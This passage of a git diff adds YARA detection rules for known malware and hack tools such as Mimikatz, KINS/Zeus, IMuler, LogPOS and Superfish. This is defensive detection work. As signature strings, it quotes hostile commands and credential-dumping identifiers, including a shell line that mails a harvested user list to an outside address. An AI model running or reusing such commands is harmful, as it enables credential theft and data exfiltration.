+ $s4 = "%p - lsasrv!LogonSessionListCount" fullword ascii
+ $s7 = "%p - lsasrv!LogonSessionList" fullword ascii
+ $s12 = "livessp!LiveGlobalLogonSessionList" fullword ascii
+ $s13 = "UndefinedLogonType" fullword ascii
+ $s14 = "[ERROR] [CRYPTO] Acquire keys" fullword ascii
+ $s15 = "masterkey" fullword ascii
+ $s16 = "kerberos!KerbGlobalLogonSessionTable" fullword ascii
+ $s17 = "RemoteInteractive" fullword ascii
+ $s18 = "mimilib.dll" fullword wide
+ $s19 = "%p - lsasrv!InitializationVector" fullword ascii
+ $s20 = "lsasrv!LogonSessionListCount" fullword ascii
+ condition:
+ all of them
+}
+
+rule Mimikatz_Samples_2014b_Family_2 {
+ meta:
+ description = "Mimikatz pwassword dumper samples from the second half of 2014"
+ author = "Florian Roth with the help of YarGen Rule Generator"
+ date = "2014/12/23"
+ super_rule = 1
+ score = 80
+ hash0 = "61001a32c5388e629dd0441a77974200057816ef"
+ hash1 = "46df272cecb541aebca3c863802c0d0a0dc5fcb4"
+ hash2 = "c3307bb70efa19fc5049dfd829d07ea52a65bb74"
+ hash3 = "29d9bfc4e4884bc7b2f3cd01960b727c17fb50cb"
+ hash4 = "ac1d1db32ca6e7af5625f0f6fbe210fe68002b5c"
+ strings:
+ $s0 = "ncryptprov.dll" fullword wide
+ $s1 = "CERT_SYSTEM_STORE_CURRENT_USER_GROUP_POLICY" fullword wide
+ $s2 = "logonPasswords" fullword wide
+ $s3 = "CERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE" fullword wide
+ $s4 = "CERT_SYSTEM_STORE_LOCAL_MACHINE_GROUP_POLICY" fullword wide
+ $s5 = "inject" fullword wide
+ $s6 = "MS_DEF_RSA_SCHANNEL_PROV" fullword wide
+ $s7 = "MS_ENHANCED_PROV" fullword wide
+ $s8 = "MS_DEF_RSA_SIG_PROV" fullword wide
+ $s9 = "privilege" fullword wide
+ $s10 = "MS_ENH_RSA_AES_PROV" fullword wide
+ $s16 = "sekurlsa" fullword wide
+ $s17 = "answer" fullword wide
+ $s18 = "secrets" fullword wide
+ $s19 = "MS_DEF_DSS_PROV" fullword wide
+ $s20 = "MS_DEF_PROV" fullword wide
+ condition:
+ all of them
+}
+
+rule LinuxHacktool_eyes_screen {
+ meta:
+ description = "Linux hack tools - file screen"
+ author = "Florian Roth"
+ reference = "not set"
+ date = "2015/01/19"
+ hash = "a240a0118739e72ff89cefa2540bf0d7da8f8a6c"
+ strings:
+ $s0 = "or: %s -r [host.tty]" fullword ascii
+ $s1 = "%s: process: character, ^x, or (octal) \\032 expected." fullword ascii
+ $s2 = "Type \"screen [-d] -r [pid.]tty.host\" to resume one of them." fullword ascii
+ $s6 = "%s: at [identifier][%%|*|#] command [args]" fullword ascii
+ $s8 = "Slurped only %d characters (of %d) into buffer - try again" fullword ascii
+ $s11 = "command from %s: %s %s" fullword ascii
+ $s16 = "[ Passwords don't match - your armor crumbles away ]" fullword ascii
+ $s19 = "[ Passwords don't match - checking turned off ]" fullword ascii
+ condition:
+ all of them
+}
+
+rule LinuxHacktool_eyes_scanssh {
+ meta:
+ description = "Linux hack tools - file scanssh"
+ author = "Florian Roth"
+ reference = "not set"
+ date = "2015/01/19"
+ hash = "467398a6994e2c1a66a3d39859cde41f090623ad"
+ strings:
+ $s0 = "Connection closed by remote host" fullword ascii
+ $s1 = "Writing packet : error on socket (or connection closed): %s" fullword ascii
+ $s2 = "Remote connection closed by signal SIG%s %s" fullword ascii
+ $s4 = "Reading private key %s failed (bad passphrase ?)" fullword ascii
+ $s5 = "Server closed connection" fullword ascii
+ $s6 = "%s: line %d: list delimiter not followed by keyword" fullword ascii
+ $s8 = "checking for version `%s' in file %s required by file %s" fullword ascii
+ $s9 = "Remote host closed connection" fullword ascii
+ $s10 = "%s: line %d: bad command `%s'" fullword ascii
+ $s13 = "verifying that server is a known host : file %s not found" fullword ascii
+ $s14 = "%s: line %d: expected service, found `%s'" fullword ascii
+ $s15 = "%s: line %d: list delimiter not followed by domain" fullword ascii
+ $s17 = "Public key from server (%s) doesn't match user preference (%s)" fullword ascii
+ condition:
+ all of them
+}
+rule LinuxHacktool_eyes_scanner {
+ meta:
+ description = "Linux hack tools - file scanner"
+ author = "Florian Roth"
+ reference = "not set"
+ date = "2015/01/19"
+ hash = "5488698b7f9090f45096517e61768efd32299d5b"
+ strings:
+ $s0 = "%s: line %d: list delimiter not followed by keyword" fullword ascii
+ $s1 = "checking for version `%s' in file %s required by file %s" fullword ascii
+ $s3 = "%s: line %d: expected service, found `%s'" fullword ascii
+ $s4 = "truncated dump file; tried to read %d header bytes, only got %lu" fullword ascii
+ $s5 = "%s: line %d: list delimiter not followed by domain" fullword ascii
+ $s7 = "'protochain' not supported with radiotap headers" fullword ascii
+ $s8 = "%s(): unsuported injection type" fullword ascii
+ $s9 = "ELF load command address/offset not properly aligned" fullword ascii
+ $s10 = "@(#) $Header: /tcpdump/master/libpcap/gencode.c,v 1.221.2.27 2005/07/14 16:01:46" ascii
+ $s20 = "%s%s%s:%u: %s%sAssertion `%s' failed." fullword ascii
+ condition:
+ 4 of them
+}
+rule LinuxHacktool_eyes_pscan2 {
+ meta:
+ description = "Linux hack tools - file pscan2"
+ author = "Florian Roth"
+ reference = "not set"
+ date = "2015/01/19"
+ hash = "56b476cba702a4423a2d805a412cae8ef4330905"
+ strings:
+ $s0 = "# pscan completed in %u seconds. (found %d ips)" fullword ascii
+ $s1 = "Usage: %s <b-block> <port> [c-block]" fullword ascii
+ $s3 = "%s.%d.* (total: %d) (%.1f%% done)" fullword ascii
+ $s8 = "Invalid IP." fullword ascii
+ $s9 = "# scanning: " fullword ascii
+ $s10 = "Unable to allocate socket." fullword ascii
+ condition:
+ 2 of them
+}
+
+rule LinuxHacktool_eyes_a {
+ meta:
+ description = "Linux hack tools - file a"
+ author = "Florian Roth"
+ reference = "not set"
+ date = "2015/01/19"
+ hash = "458ada1e37b90569b0b36afebba5ade337ea8695"
+ strings:
+ $s0 = "cat trueusers.txt | mail -s \"eyes\" clubby@slucia.com" fullword ascii
+ $s1 = "mv scan.log bios.txt" fullword ascii
+ $s2 = "rm -rf bios.txt" fullword ascii
+ $s3 = "echo -e \"# by Eyes.\"" fullword ascii
+ $s4 = "././pscan2 $1 22" fullword ascii
+ $s10 = "echo \"#cautam...\"" fullword ascii
+ condition:
+ 2 of them
+}
+
+rule LinuxHacktool_eyes_mass {
+ meta:
+ description = "Linux hack tools - file mass"
+ author = "Florian Roth"
+ reference = "not set"
+ date = "2015/01/19"
+ hash = "2054cb427daaca9e267b252307dad03830475f15"
+ strings:
+ $s0 = "cat trueusers.txt | mail -s \"eyes\" clubby@slucia.com" fullword ascii
+ $s1 = "echo -e \"${BLU}Private Scanner By Raphaello , DeMMoNN , tzepelush & DraC\\n\\r" ascii
+ $s3 = "killall -9 pscan2" fullword ascii
+ $s5 = "echo \"[*] ${DCYN}Gata esti h4x0r ;-)${RES} [*]\"" fullword ascii
+ $s6 = "echo -e \"${DCYN}@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#${RES}\"" fullword ascii
+ condition:
+ 1 of them
+}
+
+rule LinuxHacktool_eyes_pscan2_2 {
+ meta:
+ description = "Linux hack tools - file pscan2.c"
+ author = "Florian Roth"
+ reference = "not set"
+ date = "2015/01/19"
+ hash = "eb024dfb441471af7520215807c34d105efa5fd8"
+ strings:
+ $s0 = "snprintf(outfile, sizeof(outfile) - 1, \"scan.log\", argv[1], argv[2]);" fullword ascii
+ $s2 = "printf(\"Usage: %s <b-block> <port> [c-block]\\n\", argv[0]);" fullword ascii
+ $s3 = "printf(\"\\n# pscan completed in %u seconds. (found %d ips)\\n\", (time(0) - sca" ascii
+ $s19 = "connlist[i].addr.sin_family = AF_INET;" fullword ascii
+ $s20 = "snprintf(last, sizeof(last) - 1, \"%s.%d.* (total: %d) (%.1f%% done)\"," fullword ascii
+ condition:
+ 2 of them
+}
+
+rule CN_Portscan : APT
+{
+ meta:
+ description = "CN Port Scanner"
+ author = "Florian Roth"
+ release_date = "2013-11-29"
+ confidential = false
+ score = 70
+ strings:
+ $s1 = "MZ"
+ $s2 = "TCP 12.12.12.12"
+ condition:
+ ($s1 at 0) and $s2
+}
+
+rule WMI_vbs : APT
+{
+ meta:
+ description = "WMI Tool - APT"
+ author = "Florian Roth"
+ release_date = "2013-11-29"
+ confidential = false
+ score = 70
+ strings:
+ $s3 = "WScript.Echo \" $$\\ $$\\ $$\\ $$\\ $$$$$$\\ $$$$$$$$\\ $$\\ $$\\ $$$$$$$$\\ $$$$$$"
+ condition:
+ all of them
+}
+
diff --git a/malware/IMuler.yar b/malware/IMuler.yar
new file mode 100644
index 0000000..d229d40
--- /dev/null
+++ b/malware/IMuler.yar
@@ -0,0 +1,67 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule IMulerCode : IMuler Family
+{
+ meta:
+ description = "IMuler code tricks"
+ author = "Seth Hardy"
+ last_modified = "2014-06-16"
+
+ strings:
+ // Load these function strings 4 characters at a time. These check the first two blocks:
+ $L4_tmpSpotlight = { C7 ?? 2F 74 6D 70 C7 ?? 04 2F 53 70 6F }
+ $L4_TMPAAABBB = { C7 ?? ?? ?? ?? ?? 54 4D 50 41 C7 ?? ?? ?? ?? ?? 41 41 42 42 }
+ $L4_FILEAGENTVer = { C7 ?? 46 49 4C 45 C7 ?? 04 41 47 45 4E }
+ $L4_TMP0M34JDF8 = { C7 ?? ?? ?? ?? ?? 54 4D 50 30 C7 ?? ?? ?? ?? ?? 4D 33 34 4A }
+ $L4_tmpmdworker = { C7 ?? 2F 74 6D 70 C7 ?? 04 2F 2E 6D 64 }
+
+ condition:
+ any of ($L4*)
+}
+
+rule IMulerStrings : IMuler Family
+{
+ meta:
+ description = "IMuler Identifying Strings"
+ author = "Seth Hardy"
+ last_modified = "2014-06-16"
+
+ strings:
+ $ = "/cgi-mac/"
+ $ = "xnocz1"
+ $ = "checkvir.plist"
+ $ = "/Users/apple/Documents/mac back"
+ $ = "iMuler2"
+ $ = "/Users/imac/Desktop/macback/"
+ $ = "xntaskz.gz"
+ $ = "2wmsetstatus.cgi"
+ $ = "launch-0rp.dat"
+ $ = "2wmupload.cgi"
+ $ = "xntmpz"
+ $ = "2wmrecvdata.cgi"
+ $ = "xnorz6"
+ $ = "2wmdelfile.cgi"
+ $ = "/LanchAgents/checkvir"
+ $ = "0PERA:%s"
+ $ = "/tmp/Spotlight"
+ $ = "/tmp/launch-ICS000"
+
+ condition:
+ any of them
+}
+
+rule IMuler : Family
+{
+ meta:
+ description = "IMuler"
+ author = "Seth Hardy"
+ last_modified = "2014-06-16"
+
+ condition:
+ IMulerCode or IMulerStrings
+}
diff --git a/malware/Install11.yar b/malware/Install11.yar
new file mode 100644
index 0000000..3ec2b79
--- /dev/null
+++ b/malware/Install11.yar
@@ -0,0 +1,50 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Insta11Code : Insta11 Family
+{
+ meta:
+ description = "Insta11 code features"
+ author = "Seth Hardy"
+ last_modified = "2014-06-23"
+
+ strings:
+ // jmp $+5; push 423h
+ $jumpandpush = { E9 00 00 00 00 68 23 04 00 00 }
+
+ condition:
+ any of them
+}
+
+rule Insta11Strings : Insta11 Family
+{
+ meta:
+ description = "Insta11 Identifying Strings"
+ author = "Seth Hardy"
+ last_modified = "2014-06-23"
+
+ strings:
+ $ = "XTALKER7"
+ $ = "Insta11 Microsoft" wide ascii
+ $ = "wudMessage"
+ $ = "ECD4FC4D-521C-11D0-B792-00A0C90312E1"
+ $ = "B12AE898-D056-4378-A844-6D393FE37956"
+
+ condition:
+ any of them
+}
+
+rule Insta11 : Family
+{
+ meta:
+ description = "Insta11"
+ author = "Seth Hardy"
+ last_modified = "2014-06-23"
+
+ condition:
+ Insta11Code or Insta11Strings
+}
diff --git a/malware/Intel_Virtualization.yar b/malware/Intel_Virtualization.yar
new file mode 100644
index 0000000..ef95706
--- /dev/null
+++ b/malware/Intel_Virtualization.yar
@@ -0,0 +1,40 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Intel_Virtualization_Wizard_exe {
+ meta:
+ author = "cabrel@zerklabs.com"
+ description = "Dynamic DLL abuse executable"
+
+ file_1_seen = "2013-05-21"
+ file_1_sha256 = "7787757ae851f4a162f46f794be1532ab78e1928185212bdab83b3106f28c708"
+
+ strings:
+ $a = {4C 6F 61 64 53 54 52 49 4E 47}
+ $b = {49 6E 69 74 69 61 6C 69 7A 65 4B 65 79 48 6F 6F 6B}
+ $c = {46 69 6E 64 52 65 73 6F 75 72 63 65 73}
+ $d = {4C 6F 61 64 53 54 52 49 4E 47 46 72 6F 6D 48 4B 43 55}
+ $e = {68 63 63 75 74 69 6C 73 2E 44 4C 4C}
+ condition:
+ all of them
+}
+
+rule Intel_Virtualization_Wizard_dll {
+ meta:
+ author = "cabrel@zerklabs.com"
+ description = "Dynamic DLL (Malicious)"
+
+ file_1_seen = "2013-05-21"
+ file_1_sha256 = "485ae043b6a5758789f1d33766a26d8b45b9fde09cde0512aa32d4bd1ee04f28"
+
+ strings:
+ $a = {48 3A 5C 46 61 73 74 5C 50 6C 75 67 28 68 6B 63 6D 64 29 5C}
+ $b = {64 6C 6C 5C 52 65 6C 65 61 73 65 5C 48 69 6A 61 63 6B 44 6C 6C 2E 70 64 62}
+
+ condition:
+ ($a and $b) and Intel_Virtualization_Wizard_exe
+}
diff --git a/malware/KINS.yar b/malware/KINS.yar
new file mode 100644
index 0000000..082254c
--- /dev/null
+++ b/malware/KINS.yar
@@ -0,0 +1,52 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+rule KINS_dropper {
+ meta:
+ author = "AlienVault Labs aortega@alienvault.com"
+ description = "Match protocol, process injects and windows exploit present in KINS dropper"
+ reference = "http://goo.gl/arPhm3"
+ strings:
+ // Network protocol
+ $n1 = "tid=%d&ta=%s-%x" fullword
+ $n2 = "fid=%d" fullword
+ $n3 = "%[^.].%[^(](%[^)])" fullword
+ // Injects
+ $i0 = "%s [%s %d] 77 %s"
+ $i01 = "Global\\%s%x"
+ $i1 = "Inject::InjectProcessByName()"
+ $i2 = "Inject::CopyImageToProcess()"
+ $i3 = "Inject::InjectProcess()"
+ $i4 = "Inject::InjectImageToProcess()"
+ $i5 = "Drop::InjectStartThread()"
+ // UAC bypass
+ $uac1 = "ExploitMS10_092"
+ $uac2 = "\\globalroot\\systemroot\\system32\\tasks\\" ascii wide
+ $uac3 = "<RunLevel>HighestAvailable</RunLevel>" ascii wide
+ condition:
+ 2 of ($n*) and 2 of ($i*) and 2 of ($uac*)
+}
+
+rule KINS_DLL_zeus {
+ meta:
+ author = "AlienVault Labs aortega@alienvault.com"
+ description = "Match default bot in KINS leaked dropper, Zeus"
+ reference = "http://goo.gl/arPhm3"
+ strings:
+ // Network protocol
+ $n1 = "%BOTID%" fullword
+ $n2 = "%opensocks%" fullword
+ $n3 = "%openvnc%" fullword
+ $n4 = /Global\\(s|v)_ev/ fullword
+ // Crypted strings
+ $s1 = "\x72\x6E\x6D\x2C\x36\x7D\x76\x77"
+ $s2 = "\x18\x04\x0F\x12\x16\x0A\x1E\x08\x5B\x11\x0F\x13"
+ $s3 = "\x39\x1F\x01\x07\x15\x19\x1A\x33\x19\x0D\x1F"
+ $s4 = "\x62\x6F\x71\x78\x63\x61\x7F\x69\x2D\x67\x79\x65"
+ $s5 = "\x6F\x69\x7F\x6B\x61\x53\x6A\x7C\x73\x6F\x71"
+ condition:
+ all of ($n*) and 1 of ($s*)
+}
diff --git a/malware/Kelihos.yar b/malware/Kelihos.yar
new file mode 100644
index 0000000..6b803d9
--- /dev/null
+++ b/malware/Kelihos.yar
@@ -0,0 +1,20 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule KelihosHlux
+{
+ meta:
+ author = "@malpush"
+ maltype = "KelihosHlux"
+ description = "http://malwared.ru"
+ date = "22/02/2014"
+ strings:
+ $KelihosHlux_HexString = { 73 20 7D 8B FE 95 E4 12 4F 3F 99 3F 6E C8 28 26 C2 41 D9 8F C1 6A 72 A6 CE 36 0F 73 DD 2A 72 B0 CC D1 07 8B 2B 98 73 0E 7E 8C 07 DC 6C 71 63 F4 23 27 DD 17 56 AE AB 1E 30 52 E7 54 51 F7 20 ED C7 2D 4B 72 E0 77 8E B4 D2 A8 0D 8D 6A 64 F9 B7 7B 08 70 8D EF F3 9A 77 F6 0D 88 3A 8F BB C8 89 F5 F8 39 36 BA 0E CB 38 40 BF 39 73 F4 01 DC C1 17 BF C1 76 F6 84 8F BD 87 76 BC 7F 85 41 81 BD C6 3F BC 39 BD C0 89 47 3E 92 BD 80 60 9D 89 15 6A C6 B9 89 37 C4 FF 00 3D 45 38 09 CD 29 00 90 BB B6 38 FD 28 9C 01 39 0E F9 30 A9 66 6B 19 C9 F8 4C 3E B1 C7 CB 1B C9 3A 87 3E 8E 74 E7 71 D1 }
+
+ condition:
+ $KelihosHlux_HexString
+}
diff --git a/malware/LURK0.yar b/malware/LURK0.yar
new file mode 100644
index 0000000..ae28021
--- /dev/null
+++ b/malware/LURK0.yar
@@ -0,0 +1,96 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule LURK0Header : Family LURK0 {
+ meta:
+ description = "5 char code for LURK0"
+ author = "Katie Kleemola"
+ last_updated = "07-21-2014"
+
+ strings:
+ $ = { C6 [5] 4C C6 [5] 55 C6 [5] 52 C6 [5] 4B C6 [5] 30 }
+
+ condition:
+ any of them
+}
+
+rule CCTV0Header : Family CCTV0 {
+ meta:
+ description = "5 char code for LURK0"
+ author = "Katie Kleemola"
+ last_updated = "07-21-2014"
+
+ strings:
+ //if its just one char a time
+ $ = { C6 [5] 43 C6 [5] 43 C6 [5] 54 C6 [5] 56 C6 [5] 30 }
+ // bit hacky but for when samples dont just simply mov 1 char at a time
+ $ = { B0 43 88 [3] 88 [3] C6 [3] 54 C6 [3] 56 [0-12] (B0 30 | C6 [3] 30) }
+
+ condition:
+ any of them
+}
+
+rule SharedStrings : Family {
+ meta:
+ description = "Internal names found in LURK0/CCTV0 samples"
+ author = "Katie Kleemola"
+ last_updated = "07-22-2014"
+
+ strings:
+ // internal names
+ $i1 = "Butterfly.dll"
+ $i2 = /\\BT[0-9.]+\\ButterFlyDLL\\/
+ $i3 = "ETClientDLL"
+
+ // dbx
+ $d1 = "\\DbxUpdateET\\" wide
+ $d2 = "\\DbxUpdateBT\\" wide
+ $d3 = "\\DbxUpdate\\" wide
+
+ // other folders
+ $mc1 = "\\Micet\\"
+
+ // embedded file names
+ $n1 = "IconCacheEt.dat" wide
+ $n2 = "IconConfigEt.dat" wide
+
+ $m1 = "\x00\x00ERXXXXXXX\x00\x00" wide
+ $m2 = "\x00\x00111\x00\x00" wide
+ $m3 = "\x00\x00ETUN\x00\x00" wide
+ $m4 = "\x00\x00ER\x00\x00" wide
+
+ condition:
+ any of them //todo: finetune this
+
+}
+
+rule LURK0 : Family LURK0 {
+
+ meta:
+ description = "rule for lurk0"
+ author = "Katie Kleemola"
+ last_updated = "07-22-2014"
+
+ condition:
+ LURK0Header and SharedStrings
+
+}
+
+
+rule CCTV0 : Family CCTV0 {
+
+ meta:
+ description = "rule for cctv0"
+ author = "Katie Kleemola"
+ last_updated = "07-22-2014"
+
+ condition:
+ CCTV0Header and SharedStrings
+
+}
+
+
diff --git a/malware/Lenovo_superfish.yar b/malware/Lenovo_superfish.yar
new file mode 100644
index 0000000..034c39e
--- /dev/null
+++ b/malware/Lenovo_superfish.yar
@@ -0,0 +1,29 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+/* LENOVO Superfish -------------------------------------------------------- */
+
+rule VisualDiscovery_Lonovo_Superfish_SSL_Hijack {
+ meta:
+ description = "Lenovo Superfish SSL Interceptor - file VisualDiscovery.exe"
+ author = "Florian Roth / improved by kbandla"
+ reference = "https://twitter.com/4nc4p/status/568325493558272000"
+ date = "2015/02/19"
+ hash1 = "99af9cfc7ab47f847103b5497b746407dc566963"
+ hash2 = "f0b0cd0227ba302ac9ab4f30d837422c7ae66c46"
+ hash3 = "f12edf2598d8f0732009c5cd1df5d2c559455a0b"
+ hash4 = "343af97d47582c8150d63cbced601113b14fcca6"
+ strings:
+ $mz = { 4d 5a }
+ //$s1 = "VisualDiscovery.exe" fullword wide
+ $s2 = "Invalid key length used to initialize BlowFish." fullword ascii
+ $s3 = "GetPCProxyHandler" fullword ascii
+ $s4 = "StartPCProxy" fullword ascii
+ $s5 = "SetPCProxyHandler" fullword ascii
+ condition:
+ ( $mz at 0 ) and filesize < 2MB and all of ($s*)
+}
diff --git a/malware/Leverage.yar b/malware/Leverage.yar
new file mode 100644
index 0000000..048b47d
--- /dev/null
+++ b/malware/Leverage.yar
@@ -0,0 +1,25 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule leverage_a
+{
+ meta:
+ author = "earada@alienvault.com"
+ version = "1.0"
+ description = "OSX/Leverage.A"
+ date = "2013/09"
+ strings:
+ $a1 = "ioreg -l | grep \"IOPlatformSerialNumber\" | awk -F"
+ $a2 = "+:Users:Shared:UserEvent.app:Contents:MacOS:"
+ $a3 = "rm '/Users/Shared/UserEvent.app/Contents/Resources/UserEvent.icns'"
+ $script1 = "osascript -e 'tell application \"System Events\" to get the hidden of every login item'"
+ $script2 = "osascript -e 'tell application \"System Events\" to get the name of every login item'"
+ $script3 = "osascript -e 'tell application \"System Events\" to get the path of every login item'"
+ $properties = "serverVisible \x00"
+ condition:
+ all of them
+}
diff --git a/malware/LogPOS.yar b/malware/LogPOS.yar
new file mode 100644
index 0000000..be6b0f7
--- /dev/null
+++ b/malware/LogPOS.yar
@@ -0,0 +1,23 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+rule LogPOS
+{
+ meta:
+ author = "Morphick Security"
+ description = "Detects Versions of LogPOS"
+ md5 = "af13e7583ed1b27c4ae219e344a37e2b"
+ strings:
+ $mailslot = "\\\\.\\mailslot\\LogCC"
+ $get = "GET /%s?encoding=%c&t=%c&cc=%I64d&process="
+ //64A130000000 mov eax, dword ptr fs:[0x30]
+ //8B400C mov eax, dword ptr [eax + 0xc]
+ //8B401C mov eax, dword ptr [eax + 0x1c]
+ //8B4008 mov eax, dword ptr [eax + 8]
+ $sc = {64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 }
+ condition:
+ $sc and 1 of ($mailslot,$get)
+}
diff --git a/malware/LostDoor.yar b/malware/LostDoor.yar
new file mode 100644
index 0000000..76889c9
--- /dev/null
+++ b/malware/LostDoor.yar
@@ -0,0 +1,20 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule lost_door : Trojan
+{
+ meta:
+ author="Kevin Falcoz"
+ date="23/02/2013"
+ description="Lost Door"
+
+ strings:
+ $signature1={45 44 49 54 5F 53 45 52 56 45 52} /*EDIT_SERVER*/
+
+ condition:
+ $signature1
+}
diff --git a/malware/LuckyCat.yar b/malware/LuckyCat.yar
new file mode 100644
index 0000000..c41b574
--- /dev/null
+++ b/malware/LuckyCat.yar
@@ -0,0 +1,22 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule LuckyCatCode : LuckyCat Family
+{
+ meta:
+ description = "LuckyCat code tricks"
+ author = "Seth Hardy"
+ last_modified = "2014-06-19"
+
+ strings:
+ $xordecrypt = { BF 0F 00 00 00 F7 F7 ?? ?? ?? ?? 32 14 39 80 F2 7B }
+ $dll = { C6 ?? ?? ?? 64 C6 ?? ?? ?? 6C C6 ?? ?? ?? 6C }
+ $commonletters = { B? 63 B? 61 B? 73 B? 65 }
+
+ condition:
+ $xordecrypt or ($dll and $commonletters)
+}
diff --git a/malware/MacControl.yar b/malware/MacControl.yar
new file mode 100644
index 0000000..6c66ac4
--- /dev/null
+++ b/malware/MacControl.yar
@@ -0,0 +1,56 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule MacControlCode : MacControl Family
+{
+ meta:
+ description = "MacControl code tricks"
+ author = "Seth Hardy"
+ last_modified = "2014-06-17"
+
+ strings:
+ // Load these function strings 4 characters at a time. These check the first two blocks:
+ $L4_Accept = { C7 ?? 41 63 63 65 C7 ?? 04 70 74 3A 20 }
+ $L4_AcceptLang = { C7 ?? 41 63 63 65 C7 ?? 04 70 74 2D 4C }
+ $L4_Pragma = { C7 ?? 50 72 61 67 C7 ?? 04 6D 61 3A 20 }
+ $L4_Connection = { C7 ?? 43 6F 6E 6E C7 ?? 04 65 63 74 69 }
+ $GEThgif = { C7 ?? 47 45 54 20 C7 ?? 04 2F 68 2E 67 }
+
+ condition:
+ all of ($L4*) or $GEThgif
+}
+
+rule MacControlStrings : MacControl Family
+{
+ meta:
+ description = "MacControl Identifying Strings"
+ author = "Seth Hardy"
+ last_modified = "2014-06-17"
+
+ strings:
+ $ = "HTTPHeadGet"
+ $ = "/Library/launched"
+ $ = "My connect error with no ip!"
+ $ = "Send File is Failed"
+ $ = "****************************You Have got it!****************************"
+
+ condition:
+ any of them
+}
+
+rule MacControl : Family
+{
+ meta:
+ description = "MacControl"
+ author = "Seth Hardy"
+ last_modified = "2014-06-16"
+
+ condition:
+ MacControlCode or MacControlStrings
+}
+
+
diff --git a/malware/Mirage.yar b/malware/Mirage.yar
new file mode 100644
index 0000000..850fdc5
--- /dev/null
+++ b/malware/Mirage.yar
@@ -0,0 +1,32 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule MirageStrings : Mirage Family
+{
+ meta:
+ description = "Mirage Identifying Strings"
+ author = "Seth Hardy"
+ last_modified = "2014-06-25"
+
+ strings:
+ $ = "Neo,welcome to the desert of real." wide ascii
+ $ = "/result?hl=en&id=%s"
+
+ condition:
+ any of them
+}
+
+rule Mirage : Family
+{
+ meta:
+ description = "Mirage"
+ author = "Seth Hardy"
+ last_modified = "2014-06-25"
+
+ condition:
+ MirageStrings
+}
diff --git a/malware/Miscelanea.yar b/malware/Miscelanea.yar
new file mode 100644
index 0000000..2fede01
--- /dev/null
+++ b/malware/Miscelanea.yar
@@ -0,0 +1,594 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule tran_duy_linh
+{
+meta:
+ author = "@patrickrolsen"
+ maltype = "Misc."
+ version = "0.2"
+ reference = "8fa804105b1e514e1998e543cd2ca4ea, 872876cfc9c1535cd2a5977568716ae1, etc."
+ date = "01/03/2014"
+strings:
+ $doc = {D0 CF 11 E0} //DOCFILE0
+ $string1 = "Tran Duy Linh" fullword
+ $string2 = "DLC Corporation" fullword
+condition:
+ ($doc at 0) and (all of ($string*))
+}
+
+rule misc_iocs
+{
+meta:
+ author = "@patrickrolsen"
+ maltype = "Misc."
+ version = "0.1"
+ reference = "N/A"
+strings:
+ $doc = {D0 CF 11 E0} //DOCFILE0
+ $s1 = "dw20.exe"
+ $s2 = "cmd /"
+condition:
+ ($doc at 0) and (1 of ($s*))
+}
+
+rule malicious_LNK_files
+{
+meta:
+ author = "@patrickrolsen"
+strings:
+ $magic = {4C 00 00 00 01 14 02 00} // L.......
+ $s1 = "\\RECYCLER\\" wide
+ $s2 = "%temp%" wide
+ $s3 = "%systemroot%\\system32\\cmd.exe" wide
+ //$s4 = "./start" wide
+ $s5 = "svchost.exe" wide
+ $s6 = "lsass.exe" wide
+ $s7 = "csrss.exe" wide
+ $s8 = "winlogon.exe" wide
+ //$s9 = "%cd%" wide
+ $s10 = "%appdata%" wide
+ $s11 = "%programdata%" wide
+ $s12 = "%localappdata%" wide
+ $s13 = ".cpl" wide
+condition:
+ ($magic at 0) and any of ($s*)
+}
+
+rule memory_pivy
+
+{
+ meta:
+ author = "https://github.com/jackcr/"
+ strings:
+ $a = {00 00 00 00 00 00 00 00 00 00 00 53 74 75 62 50 61 74 68 00} // presence of pivy in memory
+
+ condition:
+ any of them
+
+}
+
+rule memory_shylock
+
+{
+ meta:
+ author = "https://github.com/jackcr/"
+
+ strings:
